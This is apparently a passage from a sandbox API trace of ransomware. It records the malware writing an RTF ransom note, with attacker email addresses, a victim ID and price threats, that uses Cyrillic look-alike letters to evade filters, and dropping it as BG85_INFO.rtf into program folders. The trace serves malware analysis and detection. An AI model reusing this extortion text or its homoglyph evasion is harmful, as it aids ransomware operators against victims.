tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.562] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2863a28, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.562] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.563] CloseHandle (hObject=0x1fc) returned 1 [0064.564] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rum\\bg85_info.rtf")) returned 0xffffffff [0064.564] GetLastError () returned 0x2 [0064.564] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rum\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0064.564] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 